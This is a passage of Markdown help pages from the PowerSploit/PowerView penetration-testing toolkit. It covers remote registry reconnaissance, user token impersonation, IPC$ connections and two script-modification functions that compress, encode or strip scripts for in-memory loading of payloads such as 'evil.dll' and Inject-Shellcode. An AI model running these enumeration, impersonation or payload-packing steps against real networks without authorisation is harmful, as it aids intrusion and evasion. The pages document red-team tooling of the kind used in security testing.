49 | $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
50 | Get-WMIRegCachedRDPConnection -ComputerName PRIMARY.testlab.local -Credential $Cred
51 | ```
52 |
53 |
54 | ## PARAMETERS
55 |
56 | ### -ComputerName
57 | Specifies the hostname to query for cached RDP connections (also accepts IP addresses).
58 | Defaults to 'localhost'.
59 |
60 | ```yaml
61 | Type: String[]
62 | Parameter Sets: (All)
63 | Aliases: HostName, dnshostname, name
64 |
65 | Required: False
66 | Position: 1
67 | Default value: Localhost
68 | Accept pipeline input: True (ByPropertyName, ByValue)
69 | Accept wildcard characters: False
70 | ```
71 |
72 | ### -Credential
73 | A \[Management.Automation.PSCredential\] object of alternate credentials
74 | for connecting to the remote system.
75 |
76 | ```yaml
77 | Type: PSCredential
78 | Parameter Sets: (All)
79 | Aliases:
80 |
81 | Required: False
82 | Position: Named
83 | Default value: [Management.Automation.PSCredential]::Empty
84 | Accept pipeline input: False
85 | Accept wildcard characters: False
86 | ```
87 |
88 | ## INPUTS
89 |
90 | ## OUTPUTS
91 |
92 | ### PowerView.CachedRDPConnection
93 |
94 | A PSCustomObject containing the ComputerName and cached RDP information.
95 |
96 | ## NOTES
97 |
98 | ## RELATED LINKS
99 |
100 |
--------------------------------------------------------------------------------
/docs/Recon/Get-WMIRegLastLoggedOn.md:
--------------------------------------------------------------------------------
1 | # Get-WMIRegLastLoggedOn
2 |
3 | ## SYNOPSIS
4 | Returns the last user who logged onto the local (or a remote) machine.
5 |
6 | Note: This function requires administrative rights on the machine you're enumerating.
7 |
8 | Author: Will Schroeder (@harmj0y)
9 | License: BSD 3-Clause
10 | Required Dependencies: None
11 |
12 | ## SYNTAX
13 |
14 | ```
15 | Get-WMIRegLastLoggedOn [[-ComputerName] <String[]>] [-Credential <PSCredential>]
16 | ```
17 |
18 | ## DESCRIPTION
19 | This function uses remote registry to enumerate the LastLoggedOnUser registry key
20 | for the local (or remote) machine.
21 |
22 | ## EXAMPLES
23 |
24 | ### -------------------------- EXAMPLE 1 --------------------------
25 | ```
26 | Get-WMIRegLastLoggedOn
27 | ```
28 |
29 | Returns the last user logged onto the local machine.
30 |
31 | ### -------------------------- EXAMPLE 2 --------------------------
32 | ```
33 | Get-WMIRegLastLoggedOn -ComputerName WINDOWS1
34 | ```
35 |
36 | Returns the last user logged onto WINDOWS1.
37 |
38 | ### -------------------------- EXAMPLE 3 --------------------------
39 | ```
40 | Get-DomainComputer | Get-WMIRegLastLoggedOn
41 | ```
42 |
43 | Returns the last user logged onto all machines in the domain.
44 |
45 | ### -------------------------- EXAMPLE 4 --------------------------
46 | ```
47 | $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
48 | $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
49 | Get-WMIRegLastLoggedOn -ComputerName PRIMARY.testlab.local -Credential $Cred
50 | ```
51 |
52 |
53 | ## PARAMETERS
54 |
55 | ### -ComputerName
56 | Specifies the hostname to query for remote registry values (also accepts IP addresses).
57 | Defaults to 'localhost'.
58 |
59 | ```yaml
60 | Type: String[]
61 | Parameter Sets: (All)
62 | Aliases: HostName, dnshostname, name
63 |
64 | Required: False
65 | Position: 1
66 | Default value: Localhost
67 | Accept pipeline input: True (ByPropertyName, ByValue)
68 | Accept wildcard characters: False
69 | ```
70 |
71 | ### -Credential
72 | A \[Management.Automation.PSCredential\] object of alternate credentials
73 | for connecting to the remote system.
74 |
75 | ```yaml
76 | Type: PSCredential
77 | Parameter Sets: (All)
78 | Aliases:
79 |
80 | Required: False
81 | Position: Named
82 | Default value: [Management.Automation.PSCredential]::Empty
83 | Accept pipeline input: False
84 | Accept wildcard characters: False
85 | ```
86 |
87 | ## INPUTS
88 |
89 | ## OUTPUTS
90 |
91 | ### PowerView.LastLoggedOnUser
92 |
93 | A PSCustomObject containing the ComputerName and the last logged-on user.
94 |
95 | ## NOTES
96 |
97 | ## RELATED LINKS
98 |
99 |
--------------------------------------------------------------------------------
/docs/Recon/Get-WMIRegMountedDrive.md:
--------------------------------------------------------------------------------
1 | # Get-WMIRegMountedDrive
2 |
3 | ## SYNOPSIS
4 | Returns information about saved network mounted drives for the local (or remote) machine.
5 |
6 | Note: This function requires administrative rights on the machine you're enumerating.
7 |
8 | Author: Will Schroeder (@harmj0y)
9 | License: BSD 3-Clause
10 | Required Dependencies: ConvertFrom-SID
11 |
12 | ## SYNTAX
13 |
14 | ```
15 | Get-WMIRegMountedDrive [[-ComputerName] <String[]>] [-Credential <PSCredential>]
16 | ```
17 |
18 | ## DESCRIPTION
19 | Uses remote registry functionality to enumerate recently mounted network drives.
20 |
21 | ## EXAMPLES
22 |
23 | ### -------------------------- EXAMPLE 1 --------------------------
24 | ```
25 | Get-WMIRegMountedDrive
26 | ```
27 |
28 | Returns the saved network mounted drives for the local machine.
29 |
30 | ### -------------------------- EXAMPLE 2 --------------------------
31 | ```
32 | Get-WMIRegMountedDrive -ComputerName WINDOWS2.testlab.local
33 | ```
34 |
35 | Returns the saved network mounted drives for the WINDOWS2.testlab.local machine.
36 |
37 | ### -------------------------- EXAMPLE 3 --------------------------
38 | ```
39 | Get-DomainComputer | Get-WMIRegMountedDrive
40 | ```
41 |
42 | Returns the saved network mounted drives for all machines in the domain.
43 |
44 | ### -------------------------- EXAMPLE 4 --------------------------
45 | ```
46 | $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
47 | $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
48 | Get-WMIRegMountedDrive -ComputerName PRIMARY.testlab.local -Credential $Cred
49 | ```
50 |
51 |
52 | ## PARAMETERS
53 |
54 | ### -ComputerName
55 | Specifies the hostname to query for mounted drive information (also accepts IP addresses).
56 | Defaults to 'localhost'.
57 |
58 | ```yaml
59 | Type: String[]
60 | Parameter Sets: (All)
61 | Aliases: HostName, dnshostname, name
62 |
63 | Required: False
64 | Position: 1
65 | Default value: Localhost
66 | Accept pipeline input: True (ByPropertyName, ByValue)
67 | Accept wildcard characters: False
68 | ```
69 |
70 | ### -Credential
71 | A \[Management.Automation.PSCredential\] object of alternate credentials
72 | for connecting to the remote system.
73 |
74 | ```yaml
75 | Type: PSCredential
76 | Parameter Sets: (All)
77 | Aliases:
78 |
79 | Required: False
80 | Position: Named
81 | Default value: [Management.Automation.PSCredential]::Empty
82 | Accept pipeline input: False
83 | Accept wildcard characters: False
84 | ```
85 |
86 | ## INPUTS
87 |
88 | ## OUTPUTS
89 |
90 | ### PowerView.RegMountedDrive
91 |
92 | A PSCustomObject containing the ComputerName and mounted drive information.
93 |
94 | ## NOTES
95 |
96 | ## RELATED LINKS
97 |
98 |
--------------------------------------------------------------------------------
/docs/Recon/Get-WMIRegProxy.md:
--------------------------------------------------------------------------------
1 | # Get-WMIRegProxy
2 |
3 | ## SYNOPSIS
4 | Enumerates the proxy server and WPAD contents for the current user.
5 |
6 | Author: Will Schroeder (@harmj0y)
7 | License: BSD 3-Clause
8 | Required Dependencies: None
9 |
10 | ## SYNTAX
11 |
12 | ```
13 | Get-WMIRegProxy [[-ComputerName] <String[]>] [-Credential <PSCredential>]
14 | ```
15 |
16 | ## DESCRIPTION
17 | Enumerates the proxy server and WPAD specification for the current user
18 | on the local machine (default), or a machine specified with -ComputerName.
19 | It does this by enumerating settings from
20 | HKU:SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings.
21 |
22 | ## EXAMPLES
23 |
24 | ### -------------------------- EXAMPLE 1 --------------------------
25 | ```
26 | Get-WMIRegProxy
27 |
28 | ComputerName ProxyServer AutoConfigURL Wpad
29 | ------------ ----------- ------------- ----
30 | WINDOWS1 http://primary.test...
31 | ```
32 |
33 | ### -------------------------- EXAMPLE 2 --------------------------
34 | ```
35 | $Cred = Get-Credential "TESTLAB\administrator"
36 | Get-WMIRegProxy -Credential $Cred -ComputerName primary.testlab.local
37 |
38 | ComputerName ProxyServer AutoConfigURL Wpad
39 | ------------ ----------- ------------- ----
40 | windows1.testlab.local primary.testlab.local
41 | ```
42 |
43 |
44 | ## PARAMETERS
45 |
46 | ### -ComputerName
47 | Specifies the system to enumerate proxy settings on.
48 | Defaults to the local host.
49 |
50 | ```yaml
51 | Type: String[]
52 | Parameter Sets: (All)
53 | Aliases: HostName, dnshostname, name
54 |
55 | Required: False
56 | Position: 1
57 | Default value: $Env:COMPUTERNAME
58 | Accept pipeline input: True (ByPropertyName, ByValue)
59 | Accept wildcard characters: False
60 | ```
61 |
62 | ### -Credential
63 | A \[Management.Automation.PSCredential\] object of alternate credentials
64 | for connecting to the remote system.
65 |
66 | ```yaml
67 | Type: PSCredential
68 | Parameter Sets: (All)
69 | Aliases:
70 |
71 | Required: False
72 | Position: Named
73 | Default value: [Management.Automation.PSCredential]::Empty
74 | Accept pipeline input: False
75 | Accept wildcard characters: False
76 | ```
77 |
78 | ## INPUTS
79 |
80 | ### String
81 |
82 | Accepts one or more computer name specification strings on the pipeline (netbios or FQDN).
83 |
84 | ## OUTPUTS
85 |
86 | ### PowerView.ProxySettings
87 |
88 | Outputs custom PSObjects with the ComputerName, ProxyServer, AutoConfigURL, and WPAD contents.
89 |
90 | ## NOTES
91 |
92 | ## RELATED LINKS
93 |
94 |
--------------------------------------------------------------------------------
/docs/Recon/Invoke-RevertToSelf.md:
--------------------------------------------------------------------------------
1 | # Invoke-RevertToSelf
2 |
3 | ## SYNOPSIS
4 | Reverts any token impersonation.
5 |
6 | Author: Will Schroeder (@harmj0y)
7 | License: BSD 3-Clause
8 | Required Dependencies: PSReflect
9 |
10 | ## SYNTAX
11 |
12 | ```
13 | Invoke-RevertToSelf [[-TokenHandle] <IntPtr>]
14 | ```
15 |
16 | ## DESCRIPTION
17 | This function uses RevertToSelf() to revert any impersonated tokens.
18 | If -TokenHandle is passed (the token handle returned by Invoke-UserImpersonation),
19 | CloseHandle() is used to close the opened handle.
20 |
21 | ## EXAMPLES
22 |
23 | ### -------------------------- EXAMPLE 1 --------------------------
24 | ```
25 | $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
26 | $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
27 | $Token = Invoke-UserImpersonation -Credential $Cred
28 | Invoke-RevertToSelf -TokenHandle $Token
29 | ```
30 |
31 |
32 | ## PARAMETERS
33 |
34 | ### -TokenHandle
35 | An optional IntPtr TokenHandle returned by Invoke-UserImpersonation.
36 |
37 | ```yaml
38 | Type: IntPtr
39 | Parameter Sets: (All)
40 | Aliases:
41 |
42 | Required: False
43 | Position: 1
44 | Default value: None
45 | Accept pipeline input: False
46 | Accept wildcard characters: False
47 | ```
48 |
49 | ## INPUTS
50 |
51 | ## OUTPUTS
52 |
53 | ## NOTES
54 |
55 | ## RELATED LINKS
56 |
57 |
--------------------------------------------------------------------------------
/docs/Recon/Invoke-UserImpersonation.md:
--------------------------------------------------------------------------------
1 | # Invoke-UserImpersonation
2 |
3 | ## SYNOPSIS
4 | Creates a new "runas /netonly" type logon and impersonates the token.
5 |
6 | Author: Will Schroeder (@harmj0y)
7 | License: BSD 3-Clause
8 | Required Dependencies: PSReflect
9 |
10 | ## SYNTAX
11 |
12 | ### Credential (Default)
13 | ```
14 | Invoke-UserImpersonation -Credential <PSCredential> [-Quiet]
15 | ```
16 |
17 | ### TokenHandle
18 | ```
19 | Invoke-UserImpersonation -TokenHandle <IntPtr> [-Quiet]
20 | ```
21 |
22 | ## DESCRIPTION
23 | This function uses LogonUser() with the LOGON32_LOGON_NEW_CREDENTIALS LogonType
24 | to simulate "runas /netonly".
25 | The resulting token is then impersonated with
26 | ImpersonateLoggedOnUser() and the token handle is returned for later usage
27 | with Invoke-RevertToSelf.
28 |
29 | ## EXAMPLES
30 |
31 | ### -------------------------- EXAMPLE 1 --------------------------
32 | ```
33 | $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
34 | $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
35 | Invoke-UserImpersonation -Credential $Cred
36 | ```
37 |
38 |
39 | ## PARAMETERS
40 |
41 | ### -Credential
42 | A \[Management.Automation.PSCredential\] object with alternate credentials
43 | to impersonate in the current thread space.
44 |
45 | ```yaml
46 | Type: PSCredential
47 | Parameter Sets: Credential
48 | Aliases:
49 |
50 | Required: True
51 | Position: Named
52 | Default value: None
53 | Accept pipeline input: False
54 | Accept wildcard characters: False
55 | ```
56 |
57 | ### -TokenHandle
58 | An IntPtr TokenHandle returned by a previous Invoke-UserImpersonation.
59 | If this is supplied, LogonUser() is skipped and only ImpersonateLoggedOnUser()
60 | is executed.
61 |
62 | ```yaml
63 | Type: IntPtr
64 | Parameter Sets: TokenHandle
65 | Aliases:
66 |
67 | Required: True
68 | Position: Named
69 | Default value: None
70 | Accept pipeline input: False
71 | Accept wildcard characters: False
72 | ```
73 |
74 | ### -Quiet
75 | Suppress any warnings about STA vs MTA.
76 |
77 | ```yaml
78 | Type: SwitchParameter
79 | Parameter Sets: (All)
80 | Aliases:
81 |
82 | Required: False
83 | Position: Named
84 | Default value: False
85 | Accept pipeline input: False
86 | Accept wildcard characters: False
87 | ```
88 |
89 | ## INPUTS
90 |
91 | ## OUTPUTS
92 |
93 | ### IntPtr
94 |
95 | The TokenHandle result from LogonUser.
96 |
97 | ## NOTES
98 |
99 | ## RELATED LINKS
100 |
101 |
--------------------------------------------------------------------------------
/docs/Recon/Remove-RemoteConnection.md:
--------------------------------------------------------------------------------
1 | # Remove-RemoteConnection
2 |
3 | ## SYNOPSIS
4 | Destroys a connection created by New-RemoteConnection.
5 |
6 | Author: Will Schroeder (@harmj0y)
7 | License: BSD 3-Clause
8 | Required Dependencies: PSReflect
9 |
10 | ## SYNTAX
11 |
12 | ### ComputerName (Default)
13 | ```
14 | Remove-RemoteConnection [-ComputerName] <String[]>
15 | ```
16 |
17 | ### Path
18 | ```
19 | Remove-RemoteConnection [-Path] <String[]>
20 | ```
21 |
22 | ## DESCRIPTION
23 | This function uses WNetCancelConnection2 to destroy a connection created by
24 | New-RemoteConnection.
25 | If a -Path isn't specified, a -ComputerName is required to
26 | 'unmount' \\\\$ComputerName\IPC$.
27 |
28 | ## EXAMPLES
29 |
30 | ### -------------------------- EXAMPLE 1 --------------------------
31 | ```
32 | Remove-RemoteConnection -ComputerName 'PRIMARY.testlab.local'
33 | ```
34 |
35 | ### -------------------------- EXAMPLE 2 --------------------------
36 | ```
37 | Remove-RemoteConnection -Path '\\PRIMARY.testlab.local\C$\'
38 | ```
39 |
40 | ### -------------------------- EXAMPLE 3 --------------------------
41 | ```
42 | @('PRIMARY.testlab.local','SECONDARY.testlab.local') | Remove-RemoteConnection
43 | ```
44 |
45 | ## PARAMETERS
46 |
47 | ### -ComputerName
48 | Specifies the system to remove a \\\\ComputerName\IPC$ connection for.
49 |
50 | ```yaml
51 | Type: String[]
52 | Parameter Sets: ComputerName
53 | Aliases: HostName, dnshostname, name
54 |
55 | Required: True
56 | Position: 1
57 | Default value: None
58 | Accept pipeline input: True (ByPropertyName, ByValue)
59 | Accept wildcard characters: False
60 | ```
61 |
62 | ### -Path
63 | Specifies the remote \\\\UNC\path to remove the connection for.
64 |
65 | ```yaml
66 | Type: String[]
67 | Parameter Sets: Path
68 | Aliases:
69 |
70 | Required: True
71 | Position: 1
72 | Default value: None
73 | Accept pipeline input: False
74 | Accept wildcard characters: False
75 | ```
76 |
77 | ## INPUTS
78 |
79 | ## OUTPUTS
80 |
81 | ## NOTES
82 |
83 | ## RELATED LINKS
84 |
85 |
--------------------------------------------------------------------------------
/docs/Recon/Resolve-IPAddress.md:
--------------------------------------------------------------------------------
1 | # Resolve-IPAddress
2 |
3 | ## SYNOPSIS
4 | Resolves a given hostname to its associated IPv4 address.
5 |
6 | Author: Will Schroeder (@harmj0y)
7 | License: BSD 3-Clause
8 | Required Dependencies: None
9 |
10 | ## SYNTAX
11 |
12 | ```
13 | Resolve-IPAddress [[-ComputerName] <String[]>]
14 | ```
15 |
16 | ## DESCRIPTION
17 | Resolves a given hostname to its associated IPv4 address using
18 | \[Net.Dns\]::GetHostEntry().
19 | If no hostname is provided, the local computer name
20 | ($Env:COMPUTERNAME) is resolved.
21 |
22 | ## EXAMPLES
23 |
24 | ### -------------------------- EXAMPLE 1 --------------------------
25 | ```
26 | Resolve-IPAddress -ComputerName SERVER
27 | ```
28 |
29 | ### -------------------------- EXAMPLE 2 --------------------------
30 | ```
31 | @("SERVER1", "SERVER2") | Resolve-IPAddress
32 | ```
33 |
34 | ## PARAMETERS
35 |
36 | ### -ComputerName
37 | Specifies one or more hostnames to resolve. Defaults to the local computer name ($Env:COMPUTERNAME).
38 |
39 | ```yaml
40 | Type: String[]
41 | Parameter Sets: (All)
42 | Aliases: HostName, dnshostname, name
43 |
44 | Required: False
45 | Position: 1
46 | Default value: $Env:COMPUTERNAME
47 | Accept pipeline input: True (ByPropertyName, ByValue)
48 | Accept wildcard characters: False
49 | ```
50 |
51 | ## INPUTS
52 |
53 | ### String
54 |
55 | Accepts one or more hostname strings on the pipeline.
56 |
57 | ## OUTPUTS
58 |
59 | ### System.Management.Automation.PSCustomObject
60 |
61 | A custom PSObject with the ComputerName and IPAddress.
62 |
63 | ## NOTES
64 |
65 | ## RELATED LINKS
66 |
67 |
--------------------------------------------------------------------------------
/docs/ScriptModification/Out-CompressedDll.md:
--------------------------------------------------------------------------------
1 | # Out-CompressedDll
2 |
3 | ## SYNOPSIS
4 | Compresses, Base-64 encodes, and outputs generated code to load a managed dll in memory.
5 |
6 | PowerSploit Function: Out-CompressedDll
7 | Author: Matthew Graeber (@mattifestation)
8 | License: BSD 3-Clause
9 | Required Dependencies: None
10 | Optional Dependencies: None
11 |
12 | ## SYNTAX
13 |
14 | ```
15 | Out-CompressedDll [-FilePath] <String>
16 | ```
17 |
18 | ## DESCRIPTION
19 | Out-CompressedDll outputs code that loads a compressed representation of a managed dll in memory as a byte array.
20 |
21 | ## EXAMPLES
22 |
23 | ### -------------------------- EXAMPLE 1 --------------------------
24 | ```
25 | Out-CompressedDll -FilePath evil.dll
26 | ```
27 |
28 | Description
29 | -----------
30 | Compresses, base64 encodes, and outputs the code required to load evil.dll in memory.
31 |
32 | ## PARAMETERS
33 |
34 | ### -FilePath
35 | Specifies the path to the managed (pure MSIL) DLL to compress and encode.
36 |
37 | ```yaml
38 | Type: String
39 | Parameter Sets: (All)
40 | Aliases:
41 |
42 | Required: True
43 | Position: 1
44 | Default value: None
45 | Accept pipeline input: False
46 | Accept wildcard characters: False
47 | ```
48 |
49 | ## INPUTS
50 |
51 | ## OUTPUTS
52 |
53 | ## NOTES
54 | Only pure MSIL-based dlls can be loaded using this technique.
55 | Native or IJW ('it just works' - mixed-mode) dlls will not load.
56 |
57 | ## RELATED LINKS
58 |
59 | [http://www.exploit-monday.com/2012/12/in-memory-dll-loading.html](http://www.exploit-monday.com/2012/12/in-memory-dll-loading.html)
60 |
61 |
--------------------------------------------------------------------------------
/docs/ScriptModification/Remove-Comment.md:
--------------------------------------------------------------------------------
1 | # Remove-Comment
2 |
3 | ## SYNOPSIS
4 | Strips comments and extra whitespace from a script.
5 |
6 | PowerSploit Function: Remove-Comment
7 | Author: Matthew Graeber (@mattifestation)
8 | License: BSD 3-Clause
9 | Required Dependencies: None
10 | Optional Dependencies: None
11 |
12 | ## SYNTAX
13 |
14 | ### FilePath (Default)
15 | ```
16 | Remove-Comment [-Path] <String>
17 | ```
18 |
19 | ### ScriptBlock
20 | ```
21 | Remove-Comment [-ScriptBlock] <ScriptBlock>
22 | ```
23 |
24 | ## DESCRIPTION
25 | Remove-Comment strips out comments and unnecessary whitespace from a script.
26 | This is best used in conjunction with Out-EncodedCommand when the size of the script to be encoded might be too big.
27 |
28 | A major portion of this code was taken from the Lee Holmes' Show-ColorizedContent script.
29 | You rock, Lee!
30 |
31 | ## EXAMPLES
32 |
33 | ### -------------------------- EXAMPLE 1 --------------------------
34 | ```
35 | $Stripped = Remove-Comment -Path .\ScriptWithComments.ps1
36 | ```
37 |
38 | ### -------------------------- EXAMPLE 2 --------------------------
39 | ```
40 | Remove-Comment -ScriptBlock {
41 | ### This is my awesome script. My documentation is beyond reproach!
42 |     Write-Host 'Hello, World!' ### Write 'Hello, World' to the host
43 | ### End script awesomeness
44 | }
45 | ```
46 |
47 | Description
48 | -----------
49 | The comments and extra whitespace are stripped, leaving only: `Write-Host 'Hello, World!'`
50 |
51 | ### -------------------------- EXAMPLE 3 --------------------------
52 | ```
53 | Remove-Comment -Path Inject-Shellcode.ps1 | Out-EncodedCommand
54 | ```
55 |
56 | Description
57 | -----------
58 | Removes extraneous whitespace and comments from Inject-Shellcode (which is notoriously large) and pipes the output to Out-EncodedCommand.
59 |
60 | ## PARAMETERS
61 |
62 | ### -Path
63 | Specifies the path to your script.
64 |
65 | ```yaml
66 | Type: String
67 | Parameter Sets: FilePath
68 | Aliases:
69 |
70 | Required: True
71 | Position: 1
72 | Default value: None
73 | Accept pipeline input: False
74 | Accept wildcard characters: False
75 | ```
76 |
77 | ### -ScriptBlock
78 | Specifies a scriptblock containing your script.
79 |
80 | ```yaml
81 | Type: ScriptBlock
82 | Parameter Sets: ScriptBlock
83 | Aliases:
84 |
85 | Required: True
86 | Position: 1
87 | Default value: None
88 | Accept pipeline input: True (ByValue)
89 | Accept wildcard characters: False
90 | ```
91 |
92 | ## INPUTS
93 |
94 | ### System.String, System.Management.Automation.ScriptBlock
95 |
96 | Accepts a scriptblock on the pipeline (by value). A path string must be passed explicitly via -Path, which does not accept pipeline input.
97 |
98 | ## OUTPUTS
99 |
100 | ### System.Management.Automation.ScriptBlock
101 |
102 | Remove-Comment returns a scriptblock. Call the ToString method to convert a scriptblock to a string, if desired.
103 |
104 | ## NOTES
105 |
106 | ## RELATED LINKS
107 |
108 | [http://www.exploit-monday.com](http://www.exploit-monday.com)
109 |
110 | [http://www.leeholmes.com/blog/2007/11/07/syntax-highlighting-in-powershell/](http://www.leeholmes.com/blog/2007/11/07/syntax-highlighting-in-powershell/)
110 |
111 |
--------------------------------------------------------------------------------